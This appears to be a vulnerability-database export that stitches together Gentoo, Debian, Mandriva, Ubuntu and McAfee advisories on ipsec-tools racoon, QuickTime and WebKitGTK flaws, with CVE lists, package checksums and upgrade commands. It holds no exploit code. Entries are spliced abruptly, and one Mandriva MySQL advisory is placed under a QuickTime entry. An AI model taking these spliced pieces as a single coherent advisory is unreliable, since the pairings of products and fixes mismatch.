Multiple errors in the IPSec Tools racoon daemon might allow remote
attackers to cause a Denial of Service.
Background
==========
The IPSec Tools are a port of KAME's IPsec utilities to the Linux-2.6
IPsec implementation. They include racoon, an Internet Key Exchange
daemon for automatically keying IPsec connections.
* Multiple memory leaks exist in (1) the eay_check_x509sign()
function in racoon/crypto_openssl.c and (2) racoon/nattraversal.c
(CVE-2009-1632).
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All IPSec Tools users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-firewall/ipsec-tools-0.7.2"
References
==========
[ 1 ] CVE-2009-1574
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1574
[ 2 ] CVE-2009-1632
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1632
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200905-03.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- --------------------------------------------------------------------------
Debian Security Advisory DSA-1804-1 security@debian.org
http://www.debian.org/security/ Nico Golde
May 20th, 2009 http://www.debian.org/security/faq
- --------------------------------------------------------------------------
Package : ipsec-tools
Vulnerability : null pointer dereference, memory leaks
Problem type : remote
Debian-specific: no
Debian bug : 527634 528933
CVE ID : CVE-2009-1574 CVE-2009-1632
Several remote vulnerabilities have been discovered in racoon, the Internet Key
Exchange daemon of ipsec-tools. This results in the daemon crashing which can be used
for denial of service attacks (CVE-2009-1574).
Various memory leaks in the X.509 certificate authentication handling and the
NAT-Traversal keepalive implementation can result in memory exhaustion and
thus denial of service (CVE-2009-1632).
For the oldstable distribution (etch), this problem has been fixed in
version 0.6.6-3.1etch3.
For the stable distribution (lenny), this problem has been fixed in
version 0.7.1-1.3+lenny2.
For the testing distribution (squeeze), this problem will be fixed soon.
For the unstable distribution (sid), this problem has been fixed in
version 1:0.7.1-1.5.
We recommend that you upgrade your ipsec-tools packages.
Upgrade instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
will update the internal database
apt-get upgrade
will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 4.0 alias etch
- -------------------------------
Debian (oldstable)
- ------------------
Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
Source archives:
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3.dsc
Size/MD5 checksum: 722 8b561cf84ac9c46ec07b037ce3ad06f1
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3.diff.gz
Size/MD5 checksum: 49875 7444fb4ad448ccfffe878801a2b88d2e
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.6.6-3.1etch3_amd64.deb
Size/MD5 checksum: 343790 9cee9f8c479a3a2952d2913d7bdc4c5d
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3_amd64.deb
Size/MD5 checksum: 89184 5ccd4554eec28da6d933dc20a8a39393
arm architecture (ARM)
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.6.6-3.1etch3_arm.deb
Size/MD5 checksum: 325706 9ce7988b74bccee252be7dac7ac8b5f7
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3_arm.deb
Size/MD5 checksum: 89748 513ded0e4a33200710444e1bf4ab67d8
hppa architecture (HP PA RISC)
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.6.6-3.1etch3_hppa.deb
Size/MD5 checksum: 353066 c56644b426ae945ca420d4ca37fc3f2a
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3_hppa.deb
Size/MD5 checksum: 94092 80b46b6fd60e857c84c588432b098957
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.6.6-3.1etch3_i386.deb
Size/MD5 checksum: 330258 b905d30958bd5c51d355f286f81b8be1
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3_i386.deb
Size/MD5 checksum: 85046 294ccbc4b51e4942edaeec7cd746dfa3
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3_ia64.deb
Size/MD5 checksum: 113356 111f0daa2075584c100efc9c11ecef73
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.6.6-3.1etch3_ia64.deb
Size/MD5 checksum: 468296 bd4d69b5e0d4ee39ec564e1304f7649c
mips architecture (MIPS (Big Endian))
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3_mips.deb
Size/MD5 checksum: 89018 b6af57d65d43a7433132bee9657ba608
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.6.6-3.1etch3_mips.deb
Size/MD5 checksum: 344558 aba2d85d5196c2a46555ad9e478d338a
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.6.6-3.1etch3_mipsel.deb
Size/MD5 checksum: 346856 97e04d97bdd55f852392d7461bad7f4d
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3_mipsel.deb
Size/MD5 checksum: 90308 9e780cda3df3384d0f1e33637d003f21
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3_powerpc.deb
Size/MD5 checksum: 91048 98174626d8ad1fba940c81001c337a4f
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.6.6-3.1etch3_powerpc.deb
Size/MD5 checksum: 337266 9f636e6d8904103b0096a4eed99e9cae
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.6.6-3.1etch3_s390.deb
Size/MD5 checksum: 341586 b42ddbad323dcdbd775d502f786ab449
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3_s390.deb
Size/MD5 checksum: 90750 62d4c3e618a6c69d532b8d8d33bb27b9
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3_sparc.deb
Size/MD5 checksum: 85710 9f1f526be4f2df4eb64d46023d87c6b3
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.6.6-3.1etch3_sparc.deb
Size/MD5 checksum: 317136 38e50e9d97b46b51d12429b9ea727858
Debian GNU/Linux 5.0 alias lenny
- --------------------------------
Debian (stable)
- ---------------
Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
Source archives:
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2.diff.gz
Size/MD5 checksum: 49472 4bc8ba2bd520a7514f2c33021c64e8ce
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1.orig.tar.gz
Size/MD5 checksum: 1039057 ddff5ec5a06b804ca23dc41268368853
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2.dsc
Size/MD5 checksum: 1144 46d3f28156ee183512a451588ef414e4
alpha architecture (DEC Alpha)
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_alpha.deb
Size/MD5 checksum: 428532 052c13540da3fab19fdca83e9a389a39
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_alpha.deb
Size/MD5 checksum: 114088 78065dd99d3732291e8d499383af17d9
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_amd64.deb
Size/MD5 checksum: 409514 a421f12270f5b22639d67be8d2cc8b4e
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_amd64.deb
Size/MD5 checksum: 104612 9ec93c697cf64232728d0dd5658efac8
arm architecture (ARM)
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_arm.deb
Size/MD5 checksum: 104604 78fa45a7e0503e4ee87e7508294cb0b0
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_arm.deb
Size/MD5 checksum: 381692 f1943edf9599189d16a2f936fa971abc
armel architecture (ARM EABI)
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_armel.deb
Size/MD5 checksum: 387510 63ebe895d019d2362a0a11a0de0842c6
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_armel.deb
Size/MD5 checksum: 104268 6c224349c910ffce5bb892f2a06dc243
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_i386.deb
Size/MD5 checksum: 375004 5a43cbb6106d576ab686e9e4eb78c245
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_i386.deb
Size/MD5 checksum: 99098 6c81df8c4653265f10ad6abf68091329
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_ia64.deb
Size/MD5 checksum: 131288 dfa8646655028ae53bddad7f41e9f3a4
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_ia64.deb
Size/MD5 checksum: 544150 8e274b6b73125efe0fa8392398e0c5ea
mips architecture (MIPS (Big Endian))
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_mips.deb
Size/MD5 checksum: 103502 5bd00dfdef0862a63bb666ed949e26ef
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_mips.deb
Size/MD5 checksum: 388820 46fc10315192943b912126fe68ffeea9
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_mipsel.deb
Size/MD5 checksum: 104216 a271cb33c891084479ed441945672f14
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_mipsel.deb
Size/MD5 checksum: 390562 352f78906e08ddb861053dfed30640bf
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_powerpc.deb
Size/MD5 checksum: 403162 0210fa37088d78ee9aa53395aa0148e8
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_powerpc.deb
Size/MD5 checksum: 109438 26f043be5fb248d33b605d1987fa472a
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_s390.deb
Size/MD5 checksum: 107474 aa6203b0e9e6dacbe39520be6b849eea
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_s390.deb
Size/MD5 checksum: 399386 e965abdcf32838fff7753e789e703205
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_sparc.deb
Size/MD5 checksum: 102486 57b2e115a15e08518f00158c1fe36cf2
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_sparc.deb
Size/MD5 checksum: 373916 7e2278ac7b4f0b352814ad2f55b1213a
These files will probably be moved into the stable distribution on
its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iEYEARECAAYFAkoUDnMACgkQHYflSXNkfP8LtgCdF9LmW/TOn9JDPTVGlt+7dccI
3MYAoJVcwmqHztsGgCgBps9hyqzrQJ5l
=84V/
-----END PGP SIGNATURE-----
.
Updated packages are available that brings ipsec-tools to version
0.7.2 for Mandriva Linux 2008.1/2009.0/2009.1 which provides numerous
bugfixes over the previous 0.7.1 version, and also corrects this
issue. ipsec-tools for Mandriva Linux Corporate Server 4 has been
patched to address this issue.
Additionally the flex package required for building ipsec-tools has
been fixed due to ipsec-tools build problems and is also available
with this update.
Update:
Packages for 2008.0 are being provided due to extended support for
Corporate products.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1574
_______________________________________________________________________
Updated Packages:
Mandriva Linux 2008.0:
8256debb7fe84394de70499907060de6 2008.0/i586/flex-2.5.33-2.1mdv2008.0.i586.rpm
c03c0f9fe8f564ea777b82789ac95f41 2008.0/i586/ipsec-tools-0.7.2-0.1mdv2008.0.i586.rpm
9da2195c693a7fe40f7afb3c5806aaca 2008.0/i586/libipsec0-0.7.2-0.1mdv2008.0.i586.rpm
29dcc9414a59cba30ce801b9fef416a6 2008.0/i586/libipsec-devel-0.7.2-0.1mdv2008.0.i586.rpm
b3ceeee8a3a36388d02426b77a45d862 2008.0/SRPMS/flex-2.5.33-2.1mdv2008.0.src.rpm
b0cb7993f29eac3d5f170c7cd3cf0cb5 2008.0/SRPMS/ipsec-tools-0.7.2-0.1mdv2008.0.src.rpm
Mandriva Linux 2008.0/X86_64:
36c5d0eb92197c814b90c814d21d3372 2008.0/x86_64/flex-2.5.33-2.1mdv2008.0.x86_64.rpm
7a976c988badcb9fae93509acfe99aa2 2008.0/x86_64/ipsec-tools-0.7.2-0.1mdv2008.0.x86_64.rpm
85b8ed6e328b048c13eb503bfee8dcdc 2008.0/x86_64/lib64ipsec0-0.7.2-0.1mdv2008.0.x86_64.rpm
a22f34f1cfac38c9029eb032e3257285 2008.0/x86_64/lib64ipsec-devel-0.7.2-0.1mdv2008.0.x86_64.rpm
b3ceeee8a3a36388d02426b77a45d862 2008.0/SRPMS/flex-2.5.33-2.1mdv2008.0.src.rpm
b0cb7993f29eac3d5f170c7cd3cf0cb5 2008.0/SRPMS/ipsec-tools-0.7.2-0.1mdv2008.0.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you. ===========================================================
Ubuntu Security Notice USN-785-1 June 09, 2009
ipsec-tools vulnerabilities
CVE-2009-1574, CVE-2009-1632
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 6.06 LTS:
racoon 1:0.6.5-4ubuntu1.3
Ubuntu 8.04 LTS:
racoon 1:0.6.7-1.1ubuntu1.2
Ubuntu 8.10:
racoon 1:0.7-2.1ubuntu1.8.10.1
Ubuntu 9.04:
racoon 1:0.7-2.1ubuntu1.9.04.1
In general, a standard system upgrade is sufficient to effect the
necessary changes. (CVE-2009-1574)
It was discovered that ipsec-tools did not properly handle memory usage
when verifying certificate signatures or processing nat-traversal
keep-alive messages |
|
var-200609-0315
|
Apple QuickTime before 7.1.3 allows user-assisted remote attackers to execute arbitrary code via a crafted FlashPix (FPX) file, which triggers an exception that leads to an operation on an uninitialized object. Apple QuickTime fails to properly handle SGI images. Apple From, as a countermeasure version Quicktime 7.1.3 Has been released.Arbitrary code or commands can be executed by a remote third party, DoS You can be attacked. Successful exploits may facilitate a remote compromise of affected computers. Apple QuickTime is a popular multimedia player that supports a wide variety of media formats. (CVE-2006-4380)
There is a bug in the MySQL-Max (and MySQL) init script where the
script was not waiting for the mysqld daemon to fully stop. This
impacted the restart beahvior during updates, as well as scripted
setups that temporarily stopped the server to backup the database
files. (Bug #15724)
The Corporate 3 and MNF2 products are not affected by these issues.
Packages have been patched to correct these issues.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4389
http://qa.mandriva.com/show_bug.cgi?id=15724
_______________________________________________________________________
Updated Packages:
Mandriva Linux 2006.0:
493567c0514a9823ff00ad729a8bd465 2006.0/RPMS/libmysql14-4.1.12-4.8.20060mdk.i586.rpm
49e04e83e5494e5e649e347bd1afe926 2006.0/RPMS/libmysql14-devel-4.1.12-4.8.20060mdk.i586.rpm
94d9cd0ba5b17473feeb23d56b90c61b 2006.0/RPMS/MySQL-4.1.12-4.8.20060mdk.i586.rpm
445d926ba55cc764d19aacfd8fffabad 2006.0/RPMS/MySQL-bench-4.1.12-4.8.20060mdk.i586.rpm
0bffe1233e429c393dee9e60cc3e3f84 2006.0/RPMS/MySQL-client-4.1.12-4.8.20060mdk.i586.rpm
064949a85982662857c5f063d20769df 2006.0/RPMS/MySQL-common-4.1.12-4.8.20060mdk.i586.rpm
6bff9b2d2d6c06220eca96b97e63df52 2006.0/RPMS/MySQL-Max-4.1.12-4.8.20060mdk.i586.rpm
7ebcd09dd60b04e988156a241e2d5f18 2006.0/RPMS/MySQL-NDB-4.1.12-4.8.20060mdk.i586.rpm
d009b4c577873cc13f68dbc85bc792cd 2006.0/SRPMS/MySQL-4.1.12-4.8.20060mdk.src.rpm
Mandriva Linux 2006.0/X86_64:
d408fc51953b3aa78388ce09f47a8487 x86_64/2006.0/RPMS/lib64mysql14-4.1.12-4.8.20060mdk.x86_64.rpm
9145678262d216544c814ba7ceedac9d x86_64/2006.0/RPMS/lib64mysql14-devel-4.1.12-4.8.20060mdk.x86_64.rpm
cb98cbb09991b13a1300c0446d8e3764 x86_64/2006.0/RPMS/MySQL-4.1.12-4.8.20060mdk.x86_64.rpm
f5db648daa13716b9ba1d910010a52f4 x86_64/2006.0/RPMS/MySQL-bench-4.1.12-4.8.20060mdk.x86_64.rpm
9cc2996dc0bcf73e054819880d2d780e x86_64/2006.0/RPMS/MySQL-client-4.1.12-4.8.20060mdk.x86_64.rpm
3b79a86727bf12654c541a2c0b9b3d3c x86_64/2006.0/RPMS/MySQL-common-4.1.12-4.8.20060mdk.x86_64.rpm
c8eefc94838cba03c03fd9493718b8bb x86_64/2006.0/RPMS/MySQL-Max-4.1.12-4.8.20060mdk.x86_64.rpm
4f9e728df755920855f2ac93a3d66bfd x86_64/2006.0/RPMS/MySQL-NDB-4.1.12-4.8.20060mdk.x86_64.rpm
d009b4c577873cc13f68dbc85bc792cd x86_64/2006.0/SRPMS/MySQL-4.1.12-4.8.20060mdk.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)
iD8DBQFE9wsJmqjQ0CJFipgRAuHgAKCSOK9Vj5b0r1iB1x9afdEie0rTNQCgkgp/
1ejA4Amd8JfkWa7DQPpj2Mg=
=aSz3
-----END PGP SIGNATURE-----
.
McAfee, Inc. QuickTime is used by the Mac OS X operating system and
by the QuickTime media player for Microsoft Windows.
Seven code execution vulnerabilities are present in QuickTime support
for various multimedia formats including: MOV, H.264, FLC, FPX and SGI.
Exploitation could lead to execution of arbitrary code. User interaction
is required for an attack to succeed.
The risk rating for these issues is medium.
_________________________________________________
* Vulnerable Systems
QuickTime 7.1.2 and below for Mac OS X
QuickTime for Windows 7.1.2 and below
_________________________________________________
* Vulnerability Information
CVE-2006-4382
Two buffer overflow vulnerabilities are present in QuickTime MOV format
support.
CVE-2006-4384
On heap overflow vulnerability is present in QuickTime FLC format
support.
CVE-2006-4385
One buffer overflow vulnerability is present in QuickTime SGI format
support.
CVE-2006-4386
One buffer overflow vulnerability is present in QuickTime MOV H.264
format support.
CVE-2006-4388
One buffer overflow vulnerability is present in QuickTime FlashPix (FPX)
format support.
CVE-2006-4389
One uninitialized memory access vulnerability is present in QuickTime
FlashPix (FPX) format support.
_________________________________________________
* Resolution
Apple has included fixes for the QuickTime issues in QuickTime version
7.1.3 for Mac OS X and for Microsoft Windows.
Further information is available at:
http://docs.info.apple.com/article.html?artnum=304357
_________________________________________________
* Credits
These vulnerabilities were discovered by Mike Price of McAfee Avert
Labs.
_________________________________________________
* Legal Notice
Copyright (C) 2006 McAfee, Inc.
The information contained within this advisory is provided for the
convenience of McAfee's customers, and may be redistributed provided
that no fee is charged for distribution and that the advisory is not
modified in any way. McAfee makes no representations or warranties
regarding the accuracy of the information referenced in this document,
or the suitability of that information for your purposes.
McAfee, Inc. and McAfee Avert Labs are registered Trademarks of McAfee,
Inc. and/or its affiliated companies in the United States and/or other
Countries. All other registered and unregistered trademarks in this
document are the sole property of their respective owners.
Best regards,
Dave Marcus, B.A., CCNA, MCSE
Security Research and Communications Manager
McAfee(r) Avert(r) Labs
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200803-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Win32 binary codecs: Multiple vulnerabilities
Date: March 04, 2008
Bugs: #150288
ID: 200803-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities in the Win32 codecs for Linux may result in
the remote execution of arbitrary code.
Background
==========
Win32 binary codecs provide support for video and audio playback.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Win32 binary codecs users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose
">=media-libs/win32codecs-20071007-r2"
Note: Since no updated binary versions have been released, the
Quicktime libraries have been removed from the package. Please use the
free alternative Quicktime implementations within VLC, MPlayer or Xine
for playback.
References
==========
[ 1 ] CVE-2006-4382
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4382
[ 2 ] CVE-2006-4384
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4384
[ 3 ] CVE-2006-4385
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4385
[ 4 ] CVE-2006-4386
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4386
[ 5 ] CVE-2006-4388
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4388
[ 6 ] CVE-2006-4389
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4389
[ 7 ] CVE-2007-4674
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4674
[ 8 ] CVE-2007-6166
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6166
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200803-08.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFHzc+AuhJ+ozIKI5gRAkBQAJ45BLSUrSDb21Ro/ZHEimwyzBpqqQCcD15e
VpxOGmsa3V34PILWdYXqoXE=
=70De
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
|
|
var-202212-1751
|
A type confusion issue was addressed with improved state handling. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.1.2. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.1.. Safari , iPadOS , iOS Multiple Apple products have a type mixup vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 202305-32
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: WebKitGTK+: Multiple Vulnerabilities
Date: May 30, 2023
Bugs: #871732, #879571, #888563, #905346, #905349, #905351
ID: 202305-32
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
=======
Multiple vulnerabilities have been found in WebkitGTK+, the worst of
which could result in arbitrary code execution.
Affected packages
================
Package Vulnerable Unaffected
------------------- ------------ ------------
net-libs/webkit-gtk < 2.40.1 >= 2.40.1
Description
==========
Multiple vulnerabilities have been discovered in WebKitGTK+. Please
review the CVE identifiers referenced below for details.
Impact
=====
Please review the referenced CVE identifiers for details.
Workaround
=========
There is no known workaround at this time.
Resolution
=========
All WebKitGTK+ users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.40.1"
References
=========
[ 1 ] CVE-2022-32885
https://nvd.nist.gov/vuln/detail/CVE-2022-32885
[ 2 ] CVE-2022-32886
https://nvd.nist.gov/vuln/detail/CVE-2022-32886
[ 3 ] CVE-2022-32888
https://nvd.nist.gov/vuln/detail/CVE-2022-32888
[ 4 ] CVE-2022-32891
https://nvd.nist.gov/vuln/detail/CVE-2022-32891
[ 5 ] CVE-2022-32923
https://nvd.nist.gov/vuln/detail/CVE-2022-32923
[ 6 ] CVE-2022-42799
https://nvd.nist.gov/vuln/detail/CVE-2022-42799
[ 7 ] CVE-2022-42823
https://nvd.nist.gov/vuln/detail/CVE-2022-42823
[ 8 ] CVE-2022-42824
https://nvd.nist.gov/vuln/detail/CVE-2022-42824
[ 9 ] CVE-2022-42826
https://nvd.nist.gov/vuln/detail/CVE-2022-42826
[ 10 ] CVE-2022-42852
https://nvd.nist.gov/vuln/detail/CVE-2022-42852
[ 11 ] CVE-2022-42856
https://nvd.nist.gov/vuln/detail/CVE-2022-42856
[ 12 ] CVE-2022-42863
https://nvd.nist.gov/vuln/detail/CVE-2022-42863
[ 13 ] CVE-2022-42867
https://nvd.nist.gov/vuln/detail/CVE-2022-42867
[ 14 ] CVE-2022-46691
https://nvd.nist.gov/vuln/detail/CVE-2022-46691
[ 15 ] CVE-2022-46692
https://nvd.nist.gov/vuln/detail/CVE-2022-46692
[ 16 ] CVE-2022-46698
https://nvd.nist.gov/vuln/detail/CVE-2022-46698
[ 17 ] CVE-2022-46699
https://nvd.nist.gov/vuln/detail/CVE-2022-46699
[ 18 ] CVE-2022-46700
https://nvd.nist.gov/vuln/detail/CVE-2022-46700
[ 19 ] CVE-2023-23517
https://nvd.nist.gov/vuln/detail/CVE-2023-23517
[ 20 ] CVE-2023-23518
https://nvd.nist.gov/vuln/detail/CVE-2023-23518
[ 21 ] CVE-2023-23529
https://nvd.nist.gov/vuln/detail/CVE-2023-23529
[ 22 ] CVE-2023-25358
https://nvd.nist.gov/vuln/detail/CVE-2023-25358
[ 23 ] CVE-2023-25360
https://nvd.nist.gov/vuln/detail/CVE-2023-25360
[ 24 ] CVE-2023-25361
https://nvd.nist.gov/vuln/detail/CVE-2023-25361
[ 25 ] CVE-2023-25362
https://nvd.nist.gov/vuln/detail/CVE-2023-25362
[ 26 ] CVE-2023-25363
https://nvd.nist.gov/vuln/detail/CVE-2023-25363
[ 27 ] CVE-2023-27932
https://nvd.nist.gov/vuln/detail/CVE-2023-27932
[ 28 ] CVE-2023-27954
https://nvd.nist.gov/vuln/detail/CVE-2023-27954
[ 29 ] CVE-2023-28205
https://nvd.nist.gov/vuln/detail/CVE-2023-28205
[ 30 ] WSA-2022-0009
https://webkitgtk.org/security/WSA-2022-0009.html
[ 31 ] WSA-2022-0010
https://webkitgtk.org/security/WSA-2022-0010.html
[ 32 ] WSA-2023-0001
https://webkitgtk.org/security/WSA-2023-0001.html
[ 33 ] WSA-2023-0002
https://webkitgtk.org/security/WSA-2023-0002.html
[ 34 ] WSA-2023-0003
https://webkitgtk.org/security/WSA-2023-0003.html
Availability
===========
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/202305-32
Concerns?
========
